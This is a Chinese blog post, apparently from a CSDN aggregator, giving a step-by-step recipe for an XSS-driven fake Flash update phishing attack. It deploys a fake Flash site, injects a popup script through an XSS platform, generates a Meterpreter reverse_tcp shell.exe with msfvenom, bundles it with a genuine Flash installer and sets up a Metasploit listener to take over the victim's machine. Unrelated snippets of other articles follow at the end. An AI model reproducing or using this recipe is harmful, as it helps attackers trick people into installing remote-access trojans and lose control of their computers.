首页 > 其他分享 >xss--flash钓鱼

xss--flash钓鱼

时间:2024-07-23 19:26:14浏览次数:11  
标签:xss shell -- flash crowsec set js exe

一.本机下载小皮面板 开启环境       

二.下载flash源文件

下载地址:crowsec/crowsec_FakeFlash at master · crow821/crowsec · GitHub

三.下载完成把网站部署在phpstudy www根目录下

四 新建一个1.js文件 然后在xss平台找到flash弹窗钓鱼 然后查看他的源代码 复制到新建的1.js里面

然后在1.js里修改成伪造网站的ip

五.然后在kali里使用msf命令生成shell木马  如下图

六.把shell拖到自己主机桌面 或者根目录下

七.把flash 安装包跟shell.exe一起压缩 这个样子

八 模拟受害者的流程 最终获取到受害者⽹站控制权

Flash 官⽹下载 https://www.flash.cn/download-wins MSF ⽣成 Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=44
44 -f exe > shell.exe
# 开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run

当我们安装 上面解压好的那个flash的时候 这里就会显示 

这就是主机 然后一个flash弹窗木马就生成了 

标签:xss,shell,--,flash,crowsec,set,js,exe
From: https://blog.csdn.net/2201_75891821/article/details/140643461

相关文章

  • 条件编译,指针
    条件编译 指针指针的常见用法   int a = 100;    int b = 200;    int *p = NULL;    int *q = NULL;    p = &a;    q = &b;假设a的地址为0x00000001,b的地址为0x00000005,p指向a,q指向b含义abpq*p*qp = &b让p......
  • 使用JavaScript做一个轮播图
    <!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width,initial-scale=1.0"><title>图片轮播</titl......
  • Aquila优化算法(基本原理+matlab源代码)—— 基于Aquila Optimizer原始论文分析
    Matlab源代码位于:AquilaOptimizer:Ameta-heuristicoptimizationalgorithm-FileExchange-MATLABCentral(mathworks.cn)1Aquila优化算法AO是一种基于种群优化方法,受启发于Aquila捕获猎物的方式。Aquila捕获猎物的方式主要有四种:(1)有垂直弯曲的高空翱翔(2)用短......
  • 手写操作系统:一切从主引导扇区开始
    项目简介本项目将从零实现一个基于x8632位的操作系统,系统支持多进程的运行,虚拟内存,进程与进程之间隔离,文件系统。开发语言:汇编语言与C语言,主要是C语言。开发工具:gcc编译器,gdb调试器,qemu虚拟机,dd工具,CMake.........开发环境:windows11操作系统,VScode编辑器。计算机启动......
  • el-table合并行,控制全选框的可选状态
    给相同的类合并行<el-tableborderclass="customer-no-border-table"element-loading-text="数据正在加载中...":row-class-name="tableRowClassName":header-cell-style="{backg......
  • 大佬算法解题笔记--01
    分享一些大佬刷算法思路    资料来源于网络,侵删 ......
  • 使用示波器测试正弦信号步骤介绍
    示波器测试正弦信号是电子工程中的一项基础且重要的工作,它能够帮助工程师了解信号的频率、幅度、相位等关键参数。使用示波器测试正弦信号的步骤可以归纳如下:一、准备阶段1. 准备工具和设备:1. 数字示波器(或模拟示波器,但数字示波器因其精确度和便捷性更常用)。2. 信号发生器,......
  • 阿里云root登录,非密钥登录
    起因最近几天弄了几台阿里云服务器,发现登录貌似只能用生成本地密钥进行登录,而不是通过设置的账号密码登录,就很无语了。于是有了这个帖子解决方法查看这个文件cat/etc/ssh/sshd_config注意这两行,如果都是yes,就不用改改好后重启servicesshdrestart参考https://www......
  • 基于吴恩达的深度学习
    实验顺序(根据对应的README.md)SupervisedMachineLearning:RegressionandClassificationweek1OverviewofMachineLearning:加入社区和课程相关内容,可忽略Supervisedvs.UnsupervisedMachineLearning:了解python,jupyter和markdownPracticeQuizSupervisedvsun......
  • shardingjdbc 使用记录
    注意几个概念:数据源,数据源别名(shardingjdbc的配置会给每个数据源配置别名)db实例(物理概念),逻辑库如果db实例是同一个的话,那么可以只配置一个数据源,通过shardingjdbc的路由策略来路由到具体的逻辑库。这样可以降低db的连接数。  配置了hint的路由策略,但是没有生效,断点......